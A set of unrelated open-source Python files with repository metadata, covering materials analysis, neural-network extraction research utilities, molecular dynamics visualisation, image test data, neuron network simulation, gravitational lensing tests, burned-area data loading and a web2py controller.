chempot_vals.append(chempots[k])
return np.dot(coeffs, chempot_vals)
|
montoyjh/pymatgen
|
pymatgen/analysis/surface_analysis.py
|
Python
|
mit
| 82,695
|
[
"VASP",
"pymatgen"
] |
2f20b231d36d65e1ed49a187d2f5d97f48e396c563b205f13f79999ec7f7b433
|
# Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# https://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import numpy as np
import jax.numpy as jnp
import sys
from src.global_vars import *
from src.global_vars import __cheat_A, __cheat_B
def matmul(a,b,c,np=np):
if c is None:
c = np.zeros(1)
return np.dot(a,b)+c
def relu(x):
return x * (x>0)
# Okay so this is an ugly hack
# I want to track where the queries come from.
# So in order to pretty print line numer -> code
# open up the current file and use this as a lookup.
TRACK_LINES = False
self_lines = open(sys.argv[0]).readlines()
# We're going to keep track of all queries we've generated so that we can use them later on
# (in order to save on query efficiency)
# Format: [(x, f(x))]
SAVED_QUERIES = []
def run(x,inner_A=__cheat_A,inner_B=__cheat_B):
"""
Run the neural network forward on the input x using the matrix A,B.
Log the result as having happened so that we can debug errors and
improve query efficiency.
"""
global query_count
query_count += x.shape[0]
assert len(x.shape) == 2
orig_x = x
for i,(a,b) in enumerate(zip(inner_A,inner_B)):
# Compute the matrix product.
# This is a right-matrix product which means that rows/columns are flipped
# from the definitions in the paper.
# This was the first method I wrote and it doesn't make sense.
# Please forgive me.
x = matmul(x,a,b)
if i < len(sizes)-2:
x = x*(x>0)
SAVED_QUERIES.extend(zip(orig_x,x))
if TRACK_LINES:
for line in traceback.format_stack():
if 'repeated' in line: continue
line_no = int(line.split("line ")[1].split()[0][:-1])
if line_no not in query_count_at:
query_count_at[line_no] = 0
query_count_at[line_no] += x.shape[0]
return x
class NoCheatingError(Exception):
"""
This error is thrown by functions that cheat if we're in no-cheating mode.
To debug code it's helpful to be able to look at the weights directly,
and inspect the inner activations of the model.
But sometimes debug code can be left in by accident and we might pollute
the actual results of the paper by cheating. This error is thrown by all
functions that cheat so that we can't possibly do it by accident.
"""
class AcceptableFailure(Exception):
"""
Sometimes things fail for entirely acceptable reasons (e.g., we haven't
queried enough points to have seen all the hyperplanes, or we get stuck
in a constant zero region). When that happens we throw an AcceptableFailure
because life is tough but we should just back out and try again after
making the appropriate correction.
"""
def __init__(self, *args, **kwargs):
for k,v in kwargs.items():
setattr(self, k, v)
class GatherMoreData(AcceptableFailure):
"""
When gathering witnesses to hyperplanes, sometimes we don't have
enough and need more witnesses to *this particular neuron*.
This error says that we should gather more examples of that one.
"""
def __init__(self, data, **kwargs):
super(GatherMoreData, self).__init__(data=data, **kwargs)
def _cheat_get_inner_layers(x,A=__cheat_A,B=__cheat_B, as_list=False):
"""
Cheat to get the inner layers of the neural network.
"""
region = []
for i,(a,b) in enumerate(zip(A,B)):
x = matmul(x,a,b)
region.append(np.copy(x))
if i < len(sizes)-2:
x = x*(x>0)
return region
def cheat_get_inner_layers(x,A=A,B=B, as_list=False):
if not CHEATING: raise NoCheatingError()
return _cheat_get_inner_layers(x,A,B,as_list)
def _cheat_get_polytope_id(x,A=__cheat_A,B=__cheat_B, as_list=False, flatten=True):
"""
Cheat to get the polytope ID of the network.
"""
if not CHEATING: raise NoCheatingError()
region = []
for i,(a,b) in enumerate(zip(A,B)):
x = matmul(x,a,b)
if i < len(sizes)-2:
region.append(x<0)
x = x*(x>0)
if flatten:
arr = np.array(np.concatenate(region,axis=1),dtype=np.int64)
else:
arr = region
if as_list:
return arr
arr *= 1<<np.arange(arr.shape[1])
return np.sum(arr,axis=1)
def cheat_get_polytope_id(x,A=A,B=B, as_list=False, flatten=False):
if not CHEATING: raise NoCheatingError()
return _cheat_get_polytope_id(x,A,B,as_list, flatten)
def cheat_num_relu_crosses(low, high):
"""
Compute the number of relu crosses between low and high.
This can be a lower bound if some relu goes from 0 to 1 and back to 0,
the function here will return 0 for that relu.
"""
if not CHEATING: raise NoCheatingError()
r1 = cheat_get_polytope_id(low, as_list=True, flatten=False)
r2 = cheat_get_polytope_id(high, as_list=True, flatten=False)
o = []
for layer1,layer2 in zip(r1,r2):
o.append(np.sum(layer1 != layer2))
return o
def basis(i, N=DIM):
"""
Standard basis vector along dimension i
"""
a = np.zeros(N, dtype=np.float64)
a[i] = 1
return a
def which_is_zero(layer, values):
which = np.argmin(np.abs(values[layer]),axis=-1)
return which
def get_polytope_at(known_T, known_A, known_B, x, prior=True):
"""
Get the polytope for an input using the known transform and known A.
This function IS NOT CHEATING.
"""
if prior:
which_polytope = known_T.get_polytope(x)
else:
which_polytope = tuple()
LAYER = len(known_T.A)+1
hidden = known_T.forward(x[np.newaxis,:],with_relu=True)
which_polytope += tuple(np.int32(np.sign(matmul(hidden, known_A, known_B)))[0])
return which_polytope
def get_hidden_at(known_T, known_A, known_B, LAYER, x, prior=True):
"""
Get the hidden value for an input using the known transform and known A.
This function IS NOT CHEATING.
"""
if prior:
which_activation = [y for x in known_T.get_hidden_layers(x) for y in x]
else:
which_activation = []
which_activation += list(matmul(known_T.forward(x[np.newaxis,:], with_relu=True), known_A, known_B)[0])
return tuple(which_activation)
class KnownT:
def __init__(self, A, B):
self.A = A
self.B = B
def extend_by(self, a, b):
return KnownT(self.A+[a], self.B+[b])
def forward(self, x, with_relu=False, np=np):
for i,(a,b) in enumerate(zip(self.A,self.B)):
x = matmul(x,a,b,np)
if (i < len(self.A)-1) or with_relu:
x = x*(x>0)
return x
def forward_at(self, point, d_matrix):
if len(self.A) == 0:
return d_matrix
mask_vectors = [layer > 0 for layer in self.get_hidden_layers(point)]
h_matrix = np.array(d_matrix)
for i,(matrix,mask) in enumerate(zip(self.A, mask_vectors)):
h_matrix = matmul(h_matrix, matrix, None) * mask
return h_matrix
def get_hidden_layers(self, x, flat=False, np=np):
if len(self.A) == 0: return []
region = []
for i,(a,b) in enumerate(zip(self.A,self.B)):
x = matmul(x,a,b,np=np)
if np == jnp:
region.append(x)
else:
region.append(np.copy(x))
if i < len(self.A)-1:
x = x*(x>0)
if flat:
region = np.concatenate(region,axis=0)
return region
def get_polytope(self, x):
if len(self.A) == 0: return tuple()
h = self.get_hidden_layers(x)
h = np.concatenate(h, axis=0)
return tuple(np.int32(np.sign(h)))
def check_quality(layer_num, extracted_normal, extracted_bias, do_fix=False):
"""
Check the quality of the solution.
The first function is read-only, and just reports how good or bad things are.
The second half, when in cheating mode, will align the two matrices.
"""
print("\nCheck the solution of the last weight matrix.")
reorder = [None]*(neuron_count[layer_num+1])
for i in range(neuron_count[layer_num+1]):
gaps = []
ratios = []
for j in range(neuron_count[layer_num+1]):
if np.all(np.abs(extracted_normal[:,i])) < 1e-9:
extracted_normal[:,i] += 1e-9
ratio = __cheat_A[layer_num][:,j] / extracted_normal[:,i]
ratio = np.median(ratio)
error = __cheat_A[layer_num][:,j] - ratio * extracted_normal[:,i]
error = np.sum(error**2)/np.sum(__cheat_A[layer_num][:,j]**2)
gaps.append(error)
ratios.append(ratio)
print("Neuron", i, "maps on to neuron", np.argmin(gaps), "with error", np.min(gaps)**.5, 'ratio', ratios[np.argmin(gaps)])
print("Bias check", (__cheat_B[layer_num][np.argmin(gaps)]-extracted_bias[i]*ratios[np.argmin(gaps)]))
reorder[np.argmin(gaps)] = i
if do_fix and CHEATING:
extracted_normal[:,i] *= np.abs(ratios[np.argmin(gaps)])
extracted_bias[i] *= np.abs(ratios[np.argmin(gaps)])
if min(gaps) > 1e-2:
print("ERROR LAYER EXTRACTED INCORRECTLY")
print("\tGAPS:", " ".join("%.04f"%x for x in gaps))
print("\t Got:", " ".join("%.04f"%x for x in extracted_normal[:,i]/extracted_normal[0,i]))
print("\t Real:", " ".join("%.04f"%x for x in __cheat_A[layer_num][:,np.argmin(gaps)]/__cheat_A[layer_num][0,np.argmin(gaps)]))
# Randomly assign the unused neurons.
used = [x for x in reorder if x is not None]
missed = list(set(range(len(reorder))) - set(used))
for i in range(len(reorder)):
if reorder[i] is None:
reorder[i] = missed.pop()
if CHEATING:
extracted_normal = extracted_normal[:,reorder]
extracted_bias = extracted_bias[reorder]
return extracted_normal,extracted_bias
|
google-research/cryptanalytic-model-extraction
|
src/utils.py
|
Python
|
apache-2.0
| 10,441
|
[
"NEURON"
] |
7d14e2af515d69d68c282554dc4f863da6e56f228dd7ba554c15a742ccff2fb7
|
#!/usr/bin/env python -i
# preceding line should have path for Python on your machine
# vizplotgui_gl.py
# Purpose: viz running LAMMPS simulation via GL tool with plot and GUI
# Syntax: vizplotgui_gl.py in.lammps Nfreq compute-ID
# in.lammps = LAMMPS input script
# Nfreq = plot data point and viz shapshot every this many steps
# compute-ID = ID of compute that calculates temperature
# (or any other scalar quantity)
from __future__ import print_function
import sys,time
sys.path.append("./pizza")
# methods called by GUI
def run():
global runflag
runflag = 1
def stop():
global runflag
runflag = 0
def settemp(value):
global temptarget
temptarget = slider.get()
def quit():
global breakflag
breakflag = 1
# method called by timestep loop every Nfreq steps
# read dump snapshot and viz it, update plot with compute value
def update(ntimestep):
d.next()
d.unscale()
g.show(ntimestep)
value = lmp.extract_compute(compute,0,0)
xaxis.append(ntimestep)
yaxis.append(value)
gn.plot(xaxis,yaxis)
# parse command line
argv = sys.argv
if len(argv) != 4:
print("Syntax: vizplotgui_gl.py in.lammps Nfreq compute-ID")
sys.exit()
infile = sys.argv[1]
nfreq = int(sys.argv[2])
compute = sys.argv[3]
me = 0
from lammps import lammps
lmp = lammps()
# run infile all at once
# assumed to have no run command in it
# dump a file in native LAMMPS dump format for Pizza.py dump tool
lmp.file(infile)
lmp.command("thermo %d" % nfreq)
lmp.command("dump python all atom %d tmp.dump" % nfreq)
# initial 0-step run to generate initial 1-point plot, dump file, and image
lmp.command("run 0 pre yes post no")
value = lmp.extract_compute(compute,0,0)
ntimestep = 0
xaxis = [ntimestep]
yaxis = [value]
breakflag = 0
runflag = 0
temptarget = 1.0
# wrapper on GL window via Pizza.py gl tool
# just proc 0 handles reading of dump file and viz
if me == 0:
try:
from Tkinter import *
except:
from tkinter import *
tkroot = Tk()
tkroot.withdraw()
from dump import dump
from gl import gl
d = dump("tmp.dump",0)
g = gl(d)
d.next()
d.unscale()
g.zoom(1)
g.shift(0,0)
g.rotate(0,270)
g.q(10)
g.box(1)
g.show(ntimestep)
# display GUI with run/stop buttons and slider for temperature
if me == 0:
try:
from Tkinter import *
except:
from tkinter import *
tkroot = Tk()
tkroot.withdraw()
root = Toplevel(tkroot)
root.title("LAMMPS GUI")
frame = Frame(root)
Button(frame,text="Run",command=run).pack(side=LEFT)
Button(frame,text="Stop",command=stop).pack(side=LEFT)
slider = Scale(frame,from_=0.0,to=5.0,resolution=0.1,
orient=HORIZONTAL,label="Temperature")
slider.bind('<ButtonRelease-1>',settemp)
slider.set(temptarget)
slider.pack(side=LEFT)
Button(frame,text="Quit",command=quit).pack(side=RIGHT)
frame.pack()
tkroot.update()
# wrapper on GnuPlot via Pizza.py gnu tool
if me == 0:
from gnu import gnu
gn = gnu()
gn.plot(xaxis,yaxis)
gn.title(compute,"Timestep","Temperature")
# endless loop, checking status of GUI settings every Nfreq steps
# run with pre yes/no and post yes/no depending on go/stop status
# re-invoke fix langevin with new seed when temperature slider changes
# after re-invoke of fix langevin, run with pre yes
running = 0
temp = temptarget
seed = 12345
lmp.command("fix 2 all langevin %g %g 0.1 %d" % (temp,temp,seed))
while 1:
if me == 0: tkroot.update()
if temp != temptarget:
temp = temptarget
seed += me+1
lmp.command("fix 2 all langevin %g %g 0.1 12345" % (temp,temp))
running = 0
if runflag and running:
lmp.command("run %d pre no post no" % nfreq)
ntimestep += nfreq
if me == 0: update(ntimestep)
elif runflag and not running:
lmp.command("run %d pre yes post no" % nfreq)
ntimestep += nfreq
if me == 0: update(ntimestep)
elif not runflag and running:
lmp.command("run %d pre no post yes" % nfreq)
ntimestep += nfreq
if me == 0: update(ntimestep)
if breakflag: break
if runflag: running = 1
else: running = 0
time.sleep(0.01)
lmp.command("run 0 pre no post yes")
|
akohlmey/lammps
|
python/examples/vizplotgui_gl.py
|
Python
|
gpl-2.0
| 4,142
|
[
"LAMMPS"
] |
6083df8c0ac3ed6da4c80b104e65e172a829f82c082b80a0f1a11a24543adc7f
|
"""Standard test images.
For more images, see
- http://sipi.usc.edu/database/database.php
"""
import os as _os
from ..io import imread
from skimage import data_dir
__all__ = ['load',
'camera',
'lena',
'text',
'checkerboard',
'coins',
'moon',
'page',
'horse',
'clock',
'immunohistochemistry',
'chelsea',
'coffee']
def load(f):
"""Load an image file located in the data directory.
Parameters
----------
f : string
File name.
Returns
-------
img : ndarray
Image loaded from skimage.data_dir.
"""
return imread(_os.path.join(data_dir, f))
def camera():
"""Gray-level "camera" image.
Often used for segmentation and denoising examples.
"""
return load("camera.png")
def lena():
"""Colour "Lena" image.
The standard, yet sometimes controversial Lena test image was
scanned from the November 1972 edition of Playboy magazine. From
an image processing perspective, this image is useful because it
contains smooth, textured, shaded as well as detail areas.
"""
return load("lena.png")
def text():
"""Gray-level "text" image used for corner detection.
Notes
-----
This image was downloaded from Wikipedia
<http://en.wikipedia.org/wiki/File:Corner.png>`__.
No known copyright restrictions, released into the public domain.
"""
return load("text.png")
def checkerboard():
"""Checkerboard image.
Checkerboards are often used in image calibration, since the
corner-points are easy to locate. Because of the many parallel
edges, they also visualise distortions particularly well.
"""
return load("chessboard_GRAY.png")
def coins():
"""Greek coins from Pompeii.
This image shows several coins outlined against a gray background.
It is especially useful in, e.g. segmentation tests, where
individual objects need to be identified against a background.
The background shares enough grey levels with the coins that a
simple segmentation is not sufficient.
Notes
-----
This image was downloaded from the
`Brooklyn Museum Collection
<http://www.brooklynmuseum.org/opencollection/archives/image/617/image>`__.
No known copyright restrictions.
"""
return load("coins.png")
def moon():
"""Surface of the moon.
This low-contrast image of the surface of the moon is useful for
illustrating histogram equalization and contrast stretching.
"""
return load("moon.png")
def page():
"""Scanned page.
This image of printed text is useful for demonstrations requiring uneven
background illumination.
"""
return load("page.png")
def horse():
"""Black and white silhouette of a horse.
This image was downloaded from
`openclipart <http://openclipart.org/detail/158377/horse-by-marauder>`
Released into public domain and drawn and uploaded by Andreas Preuss
(marauder).
"""
return load("horse.png")
def clock():
"""Motion blurred clock.
This photograph of a wall clock was taken while moving the camera in an
aproximately horizontal direction. It may be used to illustrate
inverse filters and deconvolution.
Released into the public domain by the photographer (Stefan van der Walt).
"""
return load("clock_motion.png")
def immunohistochemistry():
"""Immunohistochemical (IHC) staining with hematoxylin counterstaining.
This picture shows colonic glands where the IHC expression of FHL2 protein
is revealed with DAB. Hematoxylin counterstaining is applied to enhance the
negative parts of the tissue.
This image was acquired at the Center for Microscopy And Molecular Imaging
(CMMI).
No known copyright restrictions.
"""
return load("ihc.png")
def chelsea():
"""Chelsea the cat.
An example with texture, prominent edges in horizontal and diagonal
directions, as well as features of differing scales.
Notes
-----
No copyright restrictions. CC0 by the photographer (Stefan van der Walt).
"""
return load("chelsea.png")
def coffee():
"""Coffee cup.
This photograph is courtesy of Pikolo Espresso Bar.
It contains several elliptical shapes as well as varying texture (smooth
porcelain to course wood grain).
Notes
-----
No copyright restrictions. CC0 by the photographer (Rachel Michetti).
"""
return load("coffee.png")
|
chintak/scikit-image
|
skimage/data/__init__.py
|
Python
|
bsd-3-clause
| 4,593
|
[
"ESPResSo"
] |
2aa863958c9df0b4ccef22ee54d341eaa264692902dd3e440e3f4d273df33640
|
#! /usr/bin/env python
# This version uses numpy to draw the random connections.
from scipy.optimize import fsolve
import cynest as nest
import cynest.raster_plot
import numpy
from numpy import exp
import time
def LambertWm1(x):
nest.sli_push(x); nest.sli_run('LambertWm1'); y=nest.sli_pop()
return y
def ComputePSPnorm(tauMem, CMem, tauSyn):
"""Compute the maximum of postsynaptic potential
for a synaptic input current of unit amplitude
(1 pA)"""
a = (tauMem / tauSyn)
b = (1.0 / tauSyn - 1.0 / tauMem)
# time of maximum
t_max = 1.0/b * ( -LambertWm1(-exp(-1.0/a)/a) - 1.0/a )
# maximum of PSP for current of unit amplitude
return exp(1.0)/(tauSyn*CMem*b) * ((exp(-t_max/tauMem) - exp(-t_max/tauSyn)) / b - t_max*exp(-t_max/tauSyn))
nest.ResetKernel()
startbuild= time.time()
dt = 0.1 # the resolution in ms
simtime = 1000.0 # Simulation time in ms
delay = 1.5 # synaptic delay in ms
# Parameters for asynchronous irregular firing
g = 5.0
eta = 2.0
epsilon = 0.1 # connection probability
order = 50
NE = 4*order
NI = 1*order
N_neurons = NE+NI
N_rec = 50 # record from 50 neurons
CE = epsilon*NE # number of excitatory synapses per neuron
CI = epsilon*NI # number of inhibitory synapses per neuron
C_tot = int(CI+CE) # total number of synapses per neuron
# Initialize the parameters of the integrate and fire neuron
tauSyn = 0.5
CMem = 250.0
tauMem = 20.0
theta = 20.0
J = 0.1 # postsynaptic amplitude in mV
# normalize synaptic current so that amplitude of a PSP is J
J_ex = J / ComputePSPnorm(tauMem, CMem, tauSyn)
J_in = -g*J_ex
# threshold rate, equivalent rate of events needed to
# have mean input current equal to threshold
nu_th = (theta * CMem) / (J_ex*CE*numpy.exp(1)*tauMem*tauSyn)
nu_ex = eta*nu_th
p_rate = 1000.0*nu_ex*CE
nest.SetKernelStatus({"resolution": dt, "print_time": True})
print("Building network")
neuron_params= {"C_m" : CMem,
"tau_m" : tauMem,
"tau_syn_ex": tauSyn,
"tau_syn_in": tauSyn,
"t_ref" : 2.0,
"E_L" : 0.0,
"V_reset" : 0.0,
"V_m" : 0.0,
"V_th" : theta}
nest.SetDefaults("iaf_psc_alpha", neuron_params)
nodes_ex=nest.Create("iaf_psc_alpha",NE)
nodes_in=nest.Create("iaf_psc_alpha",NI)
nest.SetDefaults("poisson_generator",{"rate": p_rate})
noise=nest.Create("poisson_generator")
espikes=nest.Create("spike_detector")
ispikes=nest.Create("spike_detector")
nest.SetStatus([espikes],[{"label": "brunel-py-ex",
"withtime": True,
"withgid": True}])
nest.SetStatus([ispikes],[{"label": "brunel-py-in",
"withtime": True,
"withgid": True}])
print("Connecting devices.")
nest.CopyModel("static_synapse","excitatory",{"weight":J_ex, "delay":delay})
nest.CopyModel("static_synapse","inhibitory",{"weight":J_in, "delay":delay})
nest.DivergentConnect(noise,nodes_ex,model="excitatory")
nest.DivergentConnect(noise,nodes_in,model="excitatory")
nest.ConvergentConnect(list(range(1,N_rec+1)),espikes,model="excitatory")
nest.ConvergentConnect(list(range(NE+1,NE+1+N_rec)),ispikes,model="excitatory")
print("Connecting network.")
# Here, we create the connections from the excitatory neurons to all other
# neurons. We exploit that the neurons have consecutive IDs, running from
# 1,...,NE for the excitatory neurons and from
# (NE+1),...,(NE+NI) for the inhibitory neurons.
numpy.random.seed(1234)
sources_ex = numpy.random.random_integers(1,NE,(N_neurons,CE))
sources_in = numpy.random.random_integers(NE+1,N_neurons,(N_neurons,CI))
# We now iterate over all neuron IDs, and connect the neuron to
# the sources from our array. The first loop connects the excitatory neurons
# and the second loop the inhibitory neurons.
for n in range(N_neurons):
nest.ConvergentConnect(list(sources_ex[n]),[n+1],model="excitatory")
for n in range(N_neurons):
nest.ConvergentConnect(list(sources_in[n]),[n+1],model="inhibitory")
endbuild=time.time()
print("Simulating.")
nest.Simulate(simtime)
endsimulate= time.time()
events_ex = nest.GetStatus(espikes,"n_events")[0]
rate_ex = events_ex/simtime*1000.0/N_rec
events_in = nest.GetStatus(ispikes,"n_events")[0]
rate_in = events_in/simtime*1000.0/N_rec
num_synapses = nest.GetDefaults("excitatory")["num_connections"]+\
nest.GetDefaults("inhibitory")["num_connections"]
build_time = endbuild-startbuild
sim_time = endsimulate-endbuild
print("Brunel network simulation (Python)")
print("Number of neurons :", N_neurons)
print("Number of synapses:", num_synapses)
print(" Exitatory :", int(CE*N_neurons)+N_neurons)
print(" Inhibitory :", int(CI*N_neurons))
print("Excitatory rate : %.2f Hz" % rate_ex)
print("Inhibitory rate : %.2f Hz" % rate_in)
print("Building time : %.2f s" % build_time)
print("Simulation time : %.2f s" % sim_time)
nest.raster_plot.from_device(espikes, hist=True)
nest.raster_plot.show()
|
QJonny/CyNest
|
cynest/examples/brunel-alpha-numpy.py
|
Python
|
gpl-2.0
| 5,113
|
[
"NEURON"
] |
4a5ed733acb92fc1c8f47a4e033e6dcf109ed0846c4d2221a999bb2448fe5adf
|
__author__ = 'sibirrer'
from astrofunc.LensingProfiles.sie import SIE
from astrofunc.LensingProfiles.spemd import SPEMD
import numpy as np
import pytest
class TestSIS(object):
"""
tests the Gaussian methods
"""
def setup(self):
self.sie = SIE()
self.spemd = SPEMD()
def test_function(self):
x = np.array([1])
y = np.array([2])
theta_E = 1.
q = 0.9
phi_G = 1.
values = self.sie.function(x, y, theta_E, q, phi_G)
gamma = 2
values_spemd = self.spemd.function(x, y, theta_E, gamma, q, phi_G)
assert values == values_spemd
def test_derivatives(self):
x = np.array([1])
y = np.array([2])
theta_E = 1.
q = 0.9
phi_G = 1.
values = self.sie.derivatives(x, y, theta_E, q, phi_G)
gamma = 2
values_spemd = self.spemd.derivatives(x, y, theta_E, gamma, q, phi_G)
assert values == values_spemd
def test_hessian(self):
x = np.array([1])
y = np.array([2])
theta_E = 1.
q = 0.9
phi_G = 1.
values = self.sie.hessian(x, y, theta_E, q, phi_G)
gamma = 2
values_spemd = self.spemd.hessian(x, y, theta_E, gamma, q, phi_G)
assert values[0] == values_spemd[0]
if __name__ == '__main__':
pytest.main()
|
sibirrer/astrofunc
|
test/test_sie.py
|
Python
|
mit
| 1,347
|
[
"Gaussian"
] |
97fbeb4906812d230322d7fa8f9218571a5badd58c5d22e76f28ad5ef1ac1790
|
#===============================================================================
# load_GFED.py
#-------------------------------------------------------------------------------
# @author D. T. Milodowski, November 2017
# This is a set of functions to load in GFED4 burned area data into numpy arrays
# These arrays have three dimensions: lat, long, time, with a monthly timestep
#
# Data references:
# - Giglio, L., J.T. Randerson, and G.R. van der Werf, (2013), J. Geophys. Res.
# Biogeosci., 118, 317328, doi:10.1002/jgrg.20042.
# - Randerson, J.T., Y. Chen, G.R. van derWerf, B.M. Rogers, and D.C. Morton
# (2012), J. Geophys. Res., 117, G04012, doi:10.1029/2012JG002128.
# - van der Werf, G.R., Randerson, J.T., Giglio, L., et al., (2017), Earth Syst..
# Sci. Data, 9, 697-720, https://doi.org/10.5194/essd-9-697-2017.
#===============================================================================
# import standard libraries
import numpy as np
# import netcdf libraries
from netCDF4 import Dataset
# Function to load GFED4 monthly data. There are two potential variables here:
# - burned area expressed as fraction of a pixel: BurnedFraction
# - burned area expressed as the area in square metres: BurnedArea
# Files collate annual data, with timestep indicated by the day of the year.
# Need to specify time period of interest and the N,S,E,W extents for the area
# of interest.
def load_GFED4_monthly(path2files,variable,start_month,start_year,end_month,end_year,N,S,E,W):
# first of all obtain the start and end date of the time series
start_date = np.datetime64('%04i-%02i' % (start_year,start_month))
end_date = (np.datetime64('%04i-%02i' % (end_year,end_month))+np.timedelta64(1,'M'))
dates = np.arange(start_date,end_date)
n_dates = dates.size
# Load one tile to dimensions of clipped array, and the array mask
NetCDF_file = '%s/GFED4_%04i.nc' % (path2files,start_year)
ds = Dataset(NetCDF_file)
lat = np.asarray(ds.variables['latitude'])
lon = np.asarray(ds.variables['longitude'])
lat_mask = np.all((lat<=N,lat>=S),axis=0)
lon_mask = np.all((lon<=E,lon>=W),axis=0)
n_lat = lat_mask.sum()
n_lon = lon_mask.sum()
ds=None
# Loop through the netcdf files, retrieving the data and putting into time series.
year = np.arange(start_year,end_year + 1)
month = np.arange(12)+1
n_years = year.size
i_mm = 0
GFED_sample = np.zeros((n_dates,n_lat,n_lon))
for yy in range(0,n_years):
# get the number of months needed for this year
n_months = 12
start_mm = 1
end_mm = 12
if yy == 0:
n_months = 12 - start_month + 1
start_mm = start_month
if year[yy] == end_year:
n_months = n_months - (12-end_month)
end_mm = end_month
NetCDF_file = '%s/GFED4_%04i.nc' % (path2files,year[yy])
print NetCDF_file
ds = Dataset(NetCDF_file)
# get area of interest
month_mask = np.all((month>=start_mm,month<=end_mm),axis=0)
array_mask = np.ix_(month_mask,lat_mask,lon_mask)
GFED_sample[i_mm:i_mm+n_months] = np.asarray(ds.variables[variable])[array_mask]
i_mm += n_months
return dates, lat[lat_mask], lon[lon_mask], GFED_sample
|
DTMilodowski/EO_data_processing
|
src/fire/load_GFED.py
|
Python
|
gpl-3.0
| 3,306
|
[
"NetCDF"
] |
c46ee3e427ea2869099a9d0449dad4f5a9d7a830da49ba1f28de1e4a12148277
|
# - Coding UTF8 -
#
# Networked Decision Making
# Development Sites (source code):
# http://code.google.com/p/global-decision-making-system/
# http://github.com/NewGlobalStrategy/NetDecisionMaking
#
# Demo Sites (Google App Engine)
# http://netdecisionmaking.appspot.com
# http://globaldecisionmaking.appspot.com
#
# License Code: MIT
# License Content: Creative Commons Attribution 3.0
#
# Also visit: www.web2py.com
# or Groups: http://groups.google.com/group/web2py
# For details on the web framework used for this development
#
# Developed by Russ King (newglobalstrategy@gmail.com
# Russ also blogs occasionally to pass the time at:
# http://proudofyourplanent.blogspot.com
# His general thinking on why this project is very important is available at
# http://www.scribd.com/doc/98216626/New-Global-Strategy
# With thanks to Guido, Massimo and many other that make this sort of thing
# much easier than it used to be
#form = SQLFORM(..., formstyle = SQLFORM.formstyles.bootstrap3)
#grid = SQLFORM.grid(..., formstyle = SQLFORM.formstyles.bootstrap3) rubbish
#grid = SQLFORM.smartgrid(..., formstyle = SQLFORM.formstyles.bootstrap3)
#class="btn btn-primary btn-lg btn-block" - next find the button setup
#class="btn btn-primary"
#A(download.title, _href=URL("getfile", args=download.file))
#response.formstyle = 'bootstrap3_inline' # or 'bootstrap3_stacked'
def index():
"""
This is the startup function.
It retrieves the 5 highest priority actions, 5 most recently resolved quests
and highest priority quests in progress.
For actions - any status except rejected are wanted but to avoid an or or a
not for GAE we will use ans3 for this purpose with numans always two for an
action this is ok. All queries are cached for 2 mins which should be OK
"""
response.flash = "Welcome to Net Decision Making"
#Move subject table to website parameters - think how this fits in though
#think this should be done elsewhere
#subj = db(db.subject.id>0).select(db.subject.longdesc).first()
if INIT:
pass
else:
redirect(URL('admin', 'init'))
response.title = "Net Decision Making"
WEBSITE_PARAMETERS = db(db.website_parameters).select(cache=(cache.ram, 1200), cacheable=True).first()
return dict(title=response.title, WEBSITE_PARAMETERS=WEBSITE_PARAMETERS)
def questload():
#this came from resolved and thinking is it may replace it in due course but have
#take then hradio button form out for now at least
#need to get the event id into the query in due course but get it basically working
#first
if request.vars.page:
page = int(request.vars.page)
else:
page = 0
if request.vars.items_per_page:
items_per_page = int(request.vars.items_per_page)
else:
items_per_page = 3
limitby = (page * items_per_page, (page + 1) * items_per_page + 1)
q = 'std'
if request.vars.sortby:
if request.vars.sortby == 'ResDate':
sortby = ~db.question.resolvedate
else:
sortby = ~db.question.priority
else:
sortby = ~db.question.createdate
if request.vars.query:
if request.vars.query == 'inprog':
q = 'inprog'
query = (db.question.qtype == 'quest') & (db.question.status == 'In Progress')
#quests = db(query).select(db.question.id, db.question.questiontext, db.question.level, db.question.priority,
# orderby=[sortby], limitby=limitby)
quests = db(query).select(db.question.id, db.question.questiontext, db.question.level, db.question.priority,
orderby=[sortby], limitby=limitby, cache=(cache.ram, 1200), cacheable=True)
elif request.vars.query == 'event':
q = 'event'
query = (db.question.eventid == session.eventid)
quests = db(query).select(db.question.id, db.question.questiontext, db.question.level, db.question.priority,
orderby=[sortby], limitby=limitby, cache=(cache.ram, 1200), cacheable=True)
else:
query = (db.question.qtype == 'quest') & (db.question.status == 'Resolved')
quests = db(query).select(db.question.id, db.question.questiontext, db.question.status, db.question.level,
db.question.priority, db.question.correctanstext, db.question.numagree,
db.question.numdisagree, orderby=[sortby], limitby=limitby,
cache=(cache.ram, 1200), cacheable=True)
return dict(quests=quests, page=page, items_per_page=items_per_page, q=q)
def actionload():
#this came from questload and it may make sense to combine - however fields
#and query would be different lets confirm works this way and then think about it
if request.vars.page:
page = int(request.vars.page)
else:
page = 0
items_per_page = 3
limitby = (page * items_per_page, (page + 1) * items_per_page + 1)
q = 'std'
if request.vars.query == 'home':
q = 'home'
query = (db.question.qtype == 'action') & (db.question.status == 'Agreed')
sortby = ~db.question.createdate
actions = db(query).select(db.question.id, db.question.status, db.question.questiontext, db.question.duedate,
db.question.responsible, db.question.priority, db.question.achieved,
db.question.activescope, db.question.category, db.question.continent,
db.question.country, db.question.subdivision, db.question.scopetext,
orderby=sortby, limitby=limitby, cache=(cache.ram, 1200), cacheable=True)
return dict(actions=actions, page=page, items_per_page=items_per_page, q=q)
def user():
"""
exposes:
http://..../[app]/default/user/login
http://..../[app]/default/user/logout
http://..../[app]/default/user/register
http://..../[app]/default/user/profile
http://..../[app]/default/user/retrieve_password
http://..../[app]/default/user/change_password
use @auth.requires_login()
@auth.requires_membership('group name')
@auth.requires_permission('read','table name',record_id)
to decorate functions that need access control
"""
#if request.args[0][:8] == "register":
response.title = "Net Decision Making"
session.exclude_cats = None
session.comblist = None
session.questlist = None
session.actlist = None
session.continent = None
session.country = None
session.subdivision = None
session.eventid = None
return dict(form=auth())
def call():
"""
exposes services. for example:
http://..../[app]/default/call/jsonrpc
decorate with @services.jsonrpc the functions to expose
supports xml, json, xmlrpc, jsonrpc, amfrpc, rss, csv
"""
return service()
@auth.requires_signature()
def data():
"""
http://..../[app]/default/data/tables
http://..../[app]/default/data/create/[table]
http://..../[app]/default/data/read/[table]/[id]
http://..../[app]/default/data/update/[table]/[id]
